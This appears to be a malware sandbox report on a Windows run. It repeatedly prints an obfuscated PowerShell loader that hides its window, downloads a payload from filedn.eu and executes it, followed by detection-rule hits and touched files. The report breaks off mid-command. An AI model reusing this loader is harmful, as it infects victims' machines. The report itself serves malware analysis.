Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Nov. 27, 2024, 12:32 p.m. | Nov. 27, 2024, 12:34 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\Grundtvigsk.cmd
2552-
-
powershell.exe powershell.exe -windowstyle hidden ";$Kridthuset='Mongolioid';;$Milestones225='Hitlerism';;$Tul='ferber';;$Digterkollektivernes='Syndicship';;$Overpsychologized='Rabbinica';;$Goulash=$host.Name;function Spermatozoers($Claustration){If ($Goulash) {$Huserende=4} for ($Diassenes=$Huserende;;$Diassenes+=5){if(!$Claustration[$Diassenes]) { break }$Pseudoprosperous183+=$Claustration[$Diassenes]}$Pseudoprosperous183}function Zantewood15($Sigismond){ .($Sab) ($Sigismond)}$Concentrated62=Spermatozoers 'Plu,n KorESvedt Mes.FlaawStateAnkeBToldCCan lLydli Sekeforfn Ku t';$Cantzari=Spermatozoers ' Ki.M TemoRaa.zShiriterml A tlS,eda S,g/';$Attachtstaskes=Spermatozoers 'TrapTNo elRednsSemi1Un,k2';$kayward='Fysi[UpteNEkspePamatSymp.guaySEndoE IndRCarpVPlaniConvc Po eplagp SubOFi hiFlorNB.rstTevaMMyosATu bnFishAHn.eGOptaEInfurErgo] Bro:Spri:RemisMacreD,piC v lU RomR,rovI Tu.TGal yKondP VrarDr coDamptSe vO BogCSli OV rdL Gui=Res $I dga diat Bl TUna A ocC Reshdel,tWankSRedrTSeclAProtsMarkKunpaeSnoos';$Cantzari+=Spermatozoers 'Posa5 D c. Mid0Ber Fisk( DelW pmaigennnAntid ChioIncuwIn.os Edl ,ysoN Be,TAppr Dema1 Mis0unde. Apr0 Acc;Nonl KompWSacki.rienbaad6Astr4Obs ;Anon ,skbxEr,s6 .ni4disp;apl, AlfrrLorrvAflv:vald1pres3Pugm1a an.Stu 0Ke.e) Shu UdtaGMarkeDelicKrimkStiloBa,i/Disv2Puds0A so1Met 0Char0E di1Genn0Nons1S yk BirFE igiHoverHaule UdrfDiscoUnpexDeni/M no1oppo3 rig1Vvr . Tob0';$Typenavnet=Spermatozoers 'smitUInsesBo ge kabrPerf- ycaam.ntg LiseSkidN,iddt';$Afstbnings=Spermatozoers 'DolihP eptGarat PrepLongsNasi:Gras/Thio/P esfRe miSicilun reLangdSnrkn Stu. Live Indu ale/ SpalStea9 Stat ullECutwwIno bAu,u9Ud tsSknd6FredaSenraMe.sR TrawAdve5ForbfVi ryIdenUUntriGlasaPatrCinc 0 ,onlNumbfComp/RestDUskiei lukDobbaFre nDownt Mi eTon rSup iUnwan Sa.gAlleeDisprForbsPens.,ubaaIndvsMossi';$Prims=Spermatozoers 'Undi>';$Sab=Spermatozoers 'IndliGennET.akX';$Telial='Debunkment';$Flyverkommandoerne='\Analyzers.Por';Zantewood15 (Spermatozoers 'Be i$RadiGHilllBortO,okrbHumbAEskal Und: .otsd.gnkHalfdLidee,ervSPseuL ndes ,riE,iniSagroT oll= Ada$HandEFrolnSammV for:StilaLandP Tasp T.aDSkibA oreT ClaA,att+Tetr$IndmfOrduLBansYH,laVBevaE omrFra KCo pO SkaM ulm,acca Fl,nhepaDe otoSurrEUddeRBescNAnape');Zantewood15 (Spermatozoers 'Flag$ FraGUdstL ForoAudiBF mbaepholSreg:MaskDAngeEvarmc Gl,ISygemTradAGaarTHe nEKlas=Defo$ StraTackfOpkoSChi tamphbAnraNSt aI AmpnIberGUne S et.A sts eksPMonalsainIHeliTu,ra(Recr$CardP prerArthI ns mdragS net)');Zantewood15 (Spermatozoers $kayward);$Afstbnings=$Decimate[0];$Trstegnings=(Spermatozoers ' ara$ Na.GSocaL PreoServbGonoApneulProg:PathP disOUnhaL ovYRnkecch.iOSpgen uxidme ke FoaN oveSAl,uAKlidt EttiAutoo.ndiNNone=CoccNNarge inswBald-KamuOWondBCt.nJTrolE Bl cTegntPare PatesEn,my Bu sSterT rubE PucmCono. .rt$FishCIs aoMgl NContCGuilE .ynNeassTSedaR,bsoAWhist RepeI ved ago6Nidg2');Zantewood15 ($Trstegnings);Zantewood15 (Spermatozoers 'Bars$ S ePTilboStaclCog.yS,akc.edfoMicrnHoved SineDralnSkaas NonaMot t AeriBorioForknSom.. itHImpreUndfaExtrdCrowePt rrUdsds nuc[,odk$RengTMultyUnsup TekeBrdsn upaVibrvGlannIndteMonot ytm]Ar i=T.ip$ComeCDe aa F rn spotIsm,zV taaSuperW,shi');$Vitriner=Spermatozoers 'Afvn$TranPUvseoprecl lngyAutecPremosnesnGulddOtheealbin tonsLedeaSelvt HouiH,meoRe an Sos.SpriD Molo ,elwStr n frel Mono NonaCla,d,nshFPel iJunilPr oe Gaz(Yakm$ ,asA NonfSubus Pjat cebCh vnEfteiFremnWestg Dipsba f, B,r$KirkGki daFi.ewTi.lbHungy.iga)';$Gawby=$skdeslsest;Zantewood15 (Spermatozoers ' Par$SolsGAgarLB.nnoU.krBSpasa Opbl Bi,:Uforb ouEClerH TraEThorr Sc,SMaskK abuE Sgelsen,SPolyeCrouR est2Komp3land3Whum=Bevi(Sea tS pieSygeSSiphT Sam-PhycpChoraMechTIdeahligg Ubes$JordgSak AGr ewCyklbbn aymalf)');while (!$Beherskelser233) {Zantewood15 (Spermatozoers 'Reci$Typog tyrlForboMor,bFor a nvelPer :MyrmAAleurTocccDeo hScoltD ter M,laS,ryi Re t jeoUnprrTae =Coai$PepoK ilsnTermy Fa,sTrant IntePalst') ;Zantewood15 $Vitriner;Zantewood15 (Spermatozoers 'ZymoSUncaT V na ripRs veT es- Ch S S aL ForeBiseereappLeio Baad4');Zantewood15 (Spermatozoers ' sid$InhugKol LPlanODyveBGulda UnaLext.:terobKonteWi nhOverECo nR VigsEfteK.dfleUkraL AscSAnkyEDesqrAfgu2Nonl3up,p3Li n= Esk( lamTBiffE ImmS iliT Hyp-Cut.PRennaSdekT,ronHP an Era$avi G.lacAHazawFiskBEle,YDeci)') ;Zantewood15 (Spermatozoers 'Modf$ScruGAnbrLUnopO BogB FinABaldLEner:ParasSandhBehoE ,allTonetGro E Vanr B rLSo,mECouns Fo S G,e= C g$utilgAfh LQuesoPercb C paLn,ilBad :GymndMaydI elsNoveS tapI endmTeleI Thel Pe.AS deT areILoveoLeucnSlageDeacnSimu+Lary+ Coa%Tv n$Rigsd maxELayoCCa yiExt,m ForAAreoTU ulERegn. EleCAg nOV shUPo.yN DecT') ;$Afstbnings=$Decimate[$Shelterless]}$Bulgari=282946;$Scarab=32008;Zantewood15 (Spermatozoers 'Ko,e$Gy aGFramlmudlOSkakBByggARe kLMill: rifo B.uRLautDPowddG.skEDis LcampiVadenForsGUnquEOmlgrRo,sNYperEUdkm Syl=Unde aagTekre Sket Hal- KekcHermo TilNSe mtY,hweScapn.elhTKab Tea$Bal GSetwaTossWD,mebStrmY');Zantewood15 (Spermatozoers 'M,re$Deglg maal lgeoA thbPrecaPerilReje:.fskBLen iAcricIlankBlo e inkrSaurnGybe Faw=Unde Ea r[O erS utoyhjersTruatUnrieFastm K n. S lC L voDys.n ,orvCurveUralrValltPseu]Hild: Olp:O esF Re,rTecto Fenm HolBAlvoaSlkks FrgeDegr6Sold4UnesS Taut.mburO eriSpernAmbeg Pla(Phyl$abekO R drH pod ob.dIrreeCloslIn,aiDusin EpigInteeUdpar V ln Haaei te)');Zantewood15 (Spermatozoers ' dic$ FerGBikuLCoseO ysiB Prea PoslHenr:Uneve M sn indNSt nuUsu IUnde Sulf=Pakv Opto[E,leS QuiYDignS R nTSupeeRelam Rom..olotSupee pedXSpr.tAars. SpeeTermn VolCBetrOTektd.heeIP,gnnKiosGKupe] nin: G k:EmboaDeg s SydCReg I SoviRese.Ap sg KapePoistCe tsHortTR.itr .nciI tenHamaGDaa (Kaps$ PotbUdspIDu lcPussk luiE krdR .innLeve)');Zantewood15 (Spermatozoers 'Tyr $PlseG ilLI.htoFuldbProvA.adeLBoff:Ulems KerKCompR ,enEGodkOEm,gLAreoi D.eeAgonrChan= .gt$ LinEMonsN acNKnivUSkolI cho.B lesCheluChizb AfrsLokaTBeskrGrusiSmelnSaltgStan(Stra$FredBBiliuHypnl Hy GBi aAEnchR spiSenn,Phr $Beshs recCSlavADe.ir RhoaGrafBEt,n)');Zantewood15 $Skreolier;"
2748
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
filedn.eu | 45.131.244.47 |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell.exe -windowstyle hidden ";$Kridthuset='Mongolioid';;$Milestones225='Hitlerism';;$Tul='ferber';;$Digterkollektivernes='Syndicship';;$Overpsychologized='Rabbinica';;$Goulash=$host.Name;function Spermatozoers($Claustration){If ($Goulash) {$Huserende=4} for ($Diassenes=$Huserende;;$Diassenes+=5){if(!$Claustration[$Diassenes]) { break }$Pseudoprosperous183+=$Claustration[$Diassenes]}$Pseudoprosperous183}function Zantewood15($Sigismond){ .($Sab) ($Sigismond)}$Concentrated62=Spermatozoers 'Plu,n KorESvedt Mes.FlaawStateAnkeBToldCCan lLydli Sekeforfn Ku t';$Cantzari=Spermatozoers ' Ki.M TemoRaa.zShiriterml A tlS,eda S,g/';$Attachtstaskes=Spermatozoers 'TrapTNo elRednsSemi1Un,k2';$kayward='Fysi[UpteNEkspePamatSymp.guaySEndoE IndRCarpVPlaniConvc Po eplagp SubOFi hiFlorNB.rstTevaMMyosATu bnFishAHn.eGOptaEInfurErgo] Bro:Spri:RemisMacreD,piC v lU RomR,rovI Tu.TGal yKondP VrarDr coDamptSe vO BogCSli OV rdL Gui=Res $I dga diat Bl TUna A ocC Reshdel,tWankSRedrTSeclAProtsMarkKunpaeSnoos';$Cantzari+=Spermatozoers 'Posa5 D c. Mid0Ber Fisk( DelW pmaigennnAntid ChioIncuwIn.os Edl ,ysoN Be,TAppr Dema1 Mis0unde. Apr0 Acc;Nonl KompWSacki.rienbaad6Astr4Obs ;Anon ,skbxEr,s6 .ni4disp;apl, AlfrrLorrvAflv:vald1pres3Pugm1a an.Stu 0Ke.e) Shu UdtaGMarkeDelicKrimkStiloBa,i/Disv2Puds0A so1Met 0Char0E di1Genn0Nons1S yk BirFE igiHoverHaule UdrfDiscoUnpexDeni/M no1oppo3 rig1Vvr . Tob0';$Typenavnet=Spermatozoers 'smitUInsesBo ge kabrPerf- ycaam.ntg LiseSkidN,iddt';$Afstbnings=Spermatozoers 'DolihP eptGarat PrepLongsNasi:Gras/Thio/P esfRe miSicilun reLangdSnrkn Stu. Live Indu ale/ SpalStea9 Stat ullECutwwIno bAu,u9Ud tsSknd6FredaSenraMe.sR TrawAdve5ForbfVi ryIdenUUntriGlasaPatrCinc 0 ,onlNumbfComp/RestDUskiei lukDobbaFre nDownt Mi eTon rSup iUnwan Sa.gAlleeDisprForbsPens.,ubaaIndvsMossi';$Prims=Spermatozoers 'Undi>';$Sab=Spermatozoers 'IndliGennET.akX';$Telial='Debunkment';$Flyverkommandoerne='\Analyzers.Por';Zantewood15 (Spermatozoers 'Be i$RadiGHilllBortO,okrbHumbAEskal Und: .otsd.gnkHalfdLidee,ervSPseuL ndes ,riE,iniSagroT oll= Ada$HandEFrolnSammV for:StilaLandP Tasp T.aDSkibA oreT ClaA,att+Tetr$IndmfOrduLBansYH,laVBevaE omrFra KCo pO SkaM ulm,acca Fl,nhepaDe otoSurrEUddeRBescNAnape');Zantewood15 (Spermatozoers 'Flag$ FraGUdstL ForoAudiBF mbaepholSreg:MaskDAngeEvarmc Gl,ISygemTradAGaarTHe nEKlas=Defo$ StraTackfOpkoSChi tamphbAnraNSt aI AmpnIberGUne S et.A sts eksPMonalsainIHeliTu,ra(Recr$CardP prerArthI ns mdragS net)');Zantewood15 (Spermatozoers $kayward);$Afstbnings=$Decimate[0];$Trstegnings=(Spermatozoers ' ara$ Na.GSocaL PreoServbGonoApneulProg:PathP disOUnhaL ovYRnkecch.iOSpgen uxidme ke FoaN oveSAl,uAKlidt EttiAutoo.ndiNNone=CoccNNarge inswBald-KamuOWondBCt.nJTrolE Bl cTegntPare PatesEn,my Bu sSterT rubE PucmCono. .rt$FishCIs aoMgl NContCGuilE .ynNeassTSedaR,bsoAWhist RepeI ved ago6Nidg2');Zantewood15 ($Trstegnings);Zantewood15 (Spermatozoers 'Bars$ S ePTilboStaclCog.yS,akc.edfoMicrnHoved SineDralnSkaas NonaMot t AeriBorioForknSom.. itHImpreUndfaExtrdCrowePt rrUdsds nuc[,odk$RengTMultyUnsup TekeBrdsn upaVibrvGlannIndteMonot ytm]Ar i=T.ip$ComeCDe aa F rn spotIsm,zV taaSuperW,shi');$Vitriner=Spermatozoers 'Afvn$TranPUvseoprecl lngyAutecPremosnesnGulddOtheealbin tonsLedeaSelvt HouiH,meoRe an Sos.SpriD Molo ,elwStr n frel Mono NonaCla,d,nshFPel iJunilPr oe Gaz(Yakm$ ,asA NonfSubus Pjat cebCh vnEfteiFremnWestg Dipsba f, B,r$KirkGki daFi.ewTi.lbHungy.iga)';$Gawby=$skdeslsest;Zantewood15 (Spermatozoers ' Par$SolsGAgarLB.nnoU.krBSpasa Opbl Bi,:Uforb ouEClerH TraEThorr Sc,SMaskK abuE Sgelsen,SPolyeCrouR est2Komp3land3Whum=Bevi(Sea tS pieSygeSSiphT Sam-PhycpChoraMechTIdeahligg Ubes$JordgSak AGr ewCyklbbn aymalf)');while (!$Beherskelser233) {Zantewood15 (Spermatozoers 'Reci$Typog tyrlForboMor,bFor a nvelPer :MyrmAAleurTocccDeo hScoltD ter M,laS,ryi Re t jeoUnprrTae =Coai$PepoK ilsnTermy Fa,sTrant IntePalst') ;Zantewood15 $Vitriner;Zantewood15 (Spermatozoers 'ZymoSUncaT V na ripRs veT es- Ch S S aL ForeBiseereappLeio Baad4');Zantewood15 (Spermatozoers ' sid$InhugKol LPlanODyveBGulda UnaLext.:terobKonteWi nhOverECo nR VigsEfteK.dfleUkraL AscSAnkyEDesqrAfgu2Nonl3up,p3Li n= Esk( lamTBiffE ImmS iliT Hyp-Cut.PRennaSdekT,ronHP an Era$avi G.lacAHazawFiskBEle,YDeci)') ;Zantewood15 (Spermatozoers 'Modf$ScruGAnbrLUnopO BogB FinABaldLEner:ParasSandhBehoE ,allTonetGro E Vanr B rLSo,mECouns Fo S G,e= C g$utilgAfh LQuesoPercb C paLn,ilBad :GymndMaydI elsNoveS tapI endmTeleI Thel Pe.AS deT areILoveoLeucnSlageDeacnSimu+Lary+ Coa%Tv n$Rigsd maxELayoCCa yiExt,m ForAAreoTU ulERegn. EleCAg nOV shUPo.yN DecT') ;$Afstbnings=$Decimate[$Shelterless]}$Bulgari=282946;$Scarab=32008;Zantewood15 (Spermatozoers 'Ko,e$Gy aGFramlmudlOSkakBByggARe kLMill: rifo B.uRLautDPowddG.skEDis LcampiVadenForsGUnquEOmlgrRo,sNYperEUdkm Syl=Unde aagTekre Sket Hal- KekcHermo TilNSe mtY,hweScapn.elhTKab Tea$Bal GSetwaTossWD,mebStrmY');Zantewood15 (Spermatozoers 'M,re$Deglg maal lgeoA thbPrecaPerilReje:.fskBLen iAcricIlankBlo e inkrSaurnGybe Faw=Unde Ea r[O erS utoyhjersTruatUnrieFastm K n. S lC L voDys.n ,orvCurveUralrValltPseu]Hild: Olp:O esF Re,rTecto Fenm HolBAlvoaSlkks FrgeDegr6Sold4UnesS Taut.mburO eriSpernAmbeg Pla(Phyl$abekO R drH pod ob.dIrreeCloslIn,aiDusin EpigInteeUdpar V ln Haaei te)');Zantewood15 (Spermatozoers ' dic$ FerGBikuLCoseO ysiB Prea PoslHenr:Uneve M sn indNSt nuUsu IUnde Sulf=Pakv Opto[E,leS QuiYDignS R nTSupeeRelam Rom..olotSupee pedXSpr.tAars. SpeeTermn VolCBetrOTektd.heeIP,gnnKiosGKupe] nin: G k:EmboaDeg s SydCReg I SoviRese.Ap sg KapePoistCe tsHortTR.itr .nciI tenHamaGDaa (Kaps$ PotbUdspIDu lcPussk luiE krdR .innLeve)');Zantewood15 (Spermatozoers 'Tyr $PlseG ilLI.htoFuldbProvA.adeLBoff:Ulems KerKCompR ,enEGodkOEm,gLAreoi D.eeAgonrChan= .gt$ LinEMonsN acNKnivUSkolI cho.B lesCheluChizb AfrsLokaTBeskrGrusiSmelnSaltgStan(Stra$FredBBiliuHypnl Hy GBi aAEnchR spiSenn,Phr $Beshs recCSlavADe.ir RhoaGrafBEt,n)');Zantewood15 $Skreolier;" |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
cmdline | powershell.exe -windowstyle hidden ";$Kridthuset='Mongolioid';;$Milestones225='Hitlerism';;$Tul='ferber';;$Digterkollektivernes='Syndicship';;$Overpsychologized='Rabbinica';;$Goulash=$host.Name;function Spermatozoers($Claustration){If ($Goulash) {$Huserende=4} for ($Diassenes=$Huserende;;$Diassenes+=5){if(!$Claustration[$Diassenes]) { break }$Pseudoprosperous183+=$Claustration[$Diassenes]}$Pseudoprosperous183}function Zantewood15($Sigismond){ .($Sab) ($Sigismond)}$Concentrated62=Spermatozoers 'Plu,n KorESvedt Mes.FlaawStateAnkeBToldCCan lLydli Sekeforfn Ku t';$Cantzari=Spermatozoers ' Ki.M TemoRaa.zShiriterml A tlS,eda S,g/';$Attachtstaskes=Spermatozoers 'TrapTNo elRednsSemi1Un,k2';$kayward='Fysi[UpteNEkspePamatSymp.guaySEndoE IndRCarpVPlaniConvc Po eplagp SubOFi hiFlorNB.rstTevaMMyosATu bnFishAHn.eGOptaEInfurErgo] Bro:Spri:RemisMacreD,piC v lU RomR,rovI Tu.TGal yKondP VrarDr coDamptSe vO BogCSli OV rdL Gui=Res $I dga diat Bl TUna A ocC Reshdel,tWankSRedrTSeclAProtsMarkKunpaeSnoos';$Cantzari+=Spermatozoers 'Posa5 D c. Mid0Ber Fisk( DelW pmaigennnAntid ChioIncuwIn.os Edl ,ysoN Be,TAppr Dema1 Mis0unde. Apr0 Acc;Nonl KompWSacki.rienbaad6Astr4Obs ;Anon ,skbxEr,s6 .ni4disp;apl, AlfrrLorrvAflv:vald1pres3Pugm1a an.Stu 0Ke.e) Shu UdtaGMarkeDelicKrimkStiloBa,i/Disv2Puds0A so1Met 0Char0E di1Genn0Nons1S yk BirFE igiHoverHaule UdrfDiscoUnpexDeni/M no1oppo3 rig1Vvr . Tob0';$Typenavnet=Spermatozoers 'smitUInsesBo ge kabrPerf- ycaam.ntg LiseSkidN,iddt';$Afstbnings=Spermatozoers 'DolihP eptGarat PrepLongsNasi:Gras/Thio/P esfRe miSicilun reLangdSnrkn Stu. Live Indu ale/ SpalStea9 Stat ullECutwwIno bAu,u9Ud tsSknd6FredaSenraMe.sR TrawAdve5ForbfVi ryIdenUUntriGlasaPatrCinc 0 ,onlNumbfComp/RestDUskiei lukDobbaFre nDownt Mi eTon rSup iUnwan Sa.gAlleeDisprForbsPens.,ubaaIndvsMossi';$Prims=Spermatozoers 'Undi>';$Sab=Spermatozoers 'IndliGennET.akX';$Telial='Debunkment';$Flyverkommandoerne='\Analyzers.Por';Zantewood15 (Spermatozoers 'Be i$RadiGHilllBortO,okrbHumbAEskal Und: .otsd.gnkHalfdLidee,ervSPseuL ndes ,riE,iniSagroT oll= Ada$HandEFrolnSammV for:StilaLandP Tasp T.aDSkibA oreT ClaA,att+Tetr$IndmfOrduLBansYH,laVBevaE omrFra KCo pO SkaM ulm,acca Fl,nhepaDe otoSurrEUddeRBescNAnape');Zantewood15 (Spermatozoers 'Flag$ FraGUdstL ForoAudiBF mbaepholSreg:MaskDAngeEvarmc Gl,ISygemTradAGaarTHe nEKlas=Defo$ StraTackfOpkoSChi tamphbAnraNSt aI AmpnIberGUne S et.A sts eksPMonalsainIHeliTu,ra(Recr$CardP prerArthI ns mdragS net)');Zantewood15 (Spermatozoers $kayward);$Afstbnings=$Decimate[0];$Trstegnings=(Spermatozoers ' ara$ Na.GSocaL PreoServbGonoApneulProg:PathP disOUnhaL ovYRnkecch.iOSpgen uxidme ke FoaN oveSAl,uAKlidt EttiAutoo.ndiNNone=CoccNNarge inswBald-KamuOWondBCt.nJTrolE Bl cTegntPare PatesEn,my Bu sSterT rubE PucmCono. .rt$FishCIs aoMgl NContCGuilE .ynNeassTSedaR,bsoAWhist RepeI ved ago6Nidg2');Zantewood15 ($Trstegnings);Zantewood15 (Spermatozoers 'Bars$ S ePTilboStaclCog.yS,akc.edfoMicrnHoved SineDralnSkaas NonaMot t AeriBorioForknSom.. itHImpreUndfaExtrdCrowePt rrUdsds nuc[,odk$RengTMultyUnsup TekeBrdsn upaVibrvGlannIndteMonot ytm]Ar i=T.ip$ComeCDe aa F rn spotIsm,zV taaSuperW,shi');$Vitriner=Spermatozoers 'Afvn$TranPUvseoprecl lngyAutecPremosnesnGulddOtheealbin tonsLedeaSelvt HouiH,meoRe an Sos.SpriD Molo ,elwStr n frel Mono NonaCla,d,nshFPel iJunilPr oe Gaz(Yakm$ ,asA NonfSubus Pjat cebCh vnEfteiFremnWestg Dipsba f, B,r$KirkGki daFi.ewTi.lbHungy.iga)';$Gawby=$skdeslsest;Zantewood15 (Spermatozoers ' Par$SolsGAgarLB.nnoU.krBSpasa Opbl Bi,:Uforb ouEClerH TraEThorr Sc,SMaskK abuE Sgelsen,SPolyeCrouR est2Komp3land3Whum=Bevi(Sea tS pieSygeSSiphT Sam-PhycpChoraMechTIdeahligg Ubes$JordgSak AGr ewCyklbbn aymalf)');while (!$Beherskelser233) {Zantewood15 (Spermatozoers 'Reci$Typog tyrlForboMor,bFor a nvelPer :MyrmAAleurTocccDeo hScoltD ter M,laS,ryi Re t jeoUnprrTae =Coai$PepoK ilsnTermy Fa,sTrant IntePalst') ;Zantewood15 $Vitriner;Zantewood15 (Spermatozoers 'ZymoSUncaT V na ripRs veT es- Ch S S aL ForeBiseereappLeio Baad4');Zantewood15 (Spermatozoers ' sid$InhugKol LPlanODyveBGulda UnaLext.:terobKonteWi nhOverECo nR VigsEfteK.dfleUkraL AscSAnkyEDesqrAfgu2Nonl3up,p3Li n= Esk( lamTBiffE ImmS iliT Hyp-Cut.PRennaSdekT,ronHP an Era$avi G.lacAHazawFiskBEle,YDeci)') ;Zantewood15 (Spermatozoers 'Modf$ScruGAnbrLUnopO BogB FinABaldLEner:ParasSandhBehoE ,allTonetGro E Vanr B rLSo,mECouns Fo S G,e= C g$utilgAfh LQuesoPercb C paLn,ilBad :GymndMaydI elsNoveS tapI endmTeleI Thel Pe.AS deT areILoveoLeucnSlageDeacnSimu+Lary+ Coa%Tv n$Rigsd maxELayoCCa yiExt,m ForAAreoTU ulERegn. EleCAg nOV shUPo.yN DecT') ;$Afstbnings=$Decimate[$Shelterless]}$Bulgari=282946;$Scarab=32008;Zantewood15 (Spermatozoers 'Ko,e$Gy aGFramlmudlOSkakBByggARe kLMill: rifo B.uRLautDPowddG.skEDis LcampiVadenForsGUnquEOmlgrRo,sNYperEUdkm Syl=Unde aagTekre Sket Hal- KekcHermo TilNSe mtY,hweScapn.elhTKab Tea$Bal GSetwaTossWD,mebStrmY');Zantewood15 (Spermatozoers 'M,re$Deglg maal lgeoA thbPrecaPerilReje:.fskBLen iAcricIlankBlo e inkrSaurnGybe Faw=Unde Ea r[O erS utoyhjersTruatUnrieFastm K n. S lC L voDys.n ,orvCurveUralrValltPseu]Hild: Olp:O esF Re,rTecto Fenm HolBAlvoaSlkks FrgeDegr6Sold4UnesS Taut.mburO eriSpernAmbeg Pla(Phyl$abekO R drH pod ob.dIrreeCloslIn,aiDusin EpigInteeUdpar V ln Haaei te)');Zantewood15 (Spermatozoers ' dic$ FerGBikuLCoseO ysiB Prea PoslHenr:Uneve M sn indNSt nuUsu IUnde Sulf=Pakv Opto[E,leS QuiYDignS R nTSupeeRelam Rom..olotSupee pedXSpr.tAars. SpeeTermn VolCBetrOTektd.heeIP,gnnKiosGKupe] nin: G k:EmboaDeg s SydCReg I SoviRese.Ap sg KapePoistCe tsHortTR.itr .nciI tenHamaGDaa (Kaps$ PotbUdspIDu lcPussk luiE krdR .innLeve)');Zantewood15 (Spermatozoers 'Tyr $PlseG ilLI.htoFuldbProvA.adeLBoff:Ulems KerKCompR ,enEGodkOEm,gLAreoi D.eeAgonrChan= .gt$ LinEMonsN acNKnivUSkolI cho.B lesCheluChizb AfrsLokaTBeskrGrusiSmelnSaltgStan(Stra$FredBBiliuHypnl Hy GBi aAEnchR spiSenn,Phr $Beshs recCSlavADe.ir RhoaGrafBEt,n)');Zantewood15 $Skreolier;" |
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
cmdline | powershell.exe -windowstyle hidden ";$Kridthuset='Mongolioid';;$Milestones225='Hitlerism';;$Tul='ferber';;$Digterkollektivernes='Syndicship';;$Overpsychologized='Rabbinica';;$Goulash=$host.Name;function Spermatozoers($Claustration){If ($Goulash) {$Huserende=4} for ($Diassenes=$Huserende;;$Diassenes+=5){if(!$Claustration[$Diassenes]) { break }$Pseudoprosperous183+=$Claustration[$Diassenes]}$Pseudoprosperous183}function Zantewood15($Sigismond){ .($Sab) ($Sigismond)}$Concentrated62=Spermatozoers 'Plu,n KorESvedt Mes.FlaawStateAnkeBToldCCan lLydli Sekeforfn Ku t';$Cantzari=Spermatozoers ' Ki.M TemoRaa.zShiriterml A tlS,eda S,g/';$Attachtstaskes=Spermatozoers 'TrapTNo elRednsSemi1Un,k2';$kayward='Fysi[UpteNEkspePamatSymp.guaySEndoE IndRCarpVPlaniConvc Po eplagp SubOFi hiFlorNB.rstTevaMMyosATu bnFishAHn.eGOptaEInfurErgo] Bro:Spri:RemisMacreD,piC v lU RomR,rovI Tu.TGal yKondP VrarDr coDamptSe vO BogCSli OV rdL Gui=Res $I dga diat Bl TUna A ocC 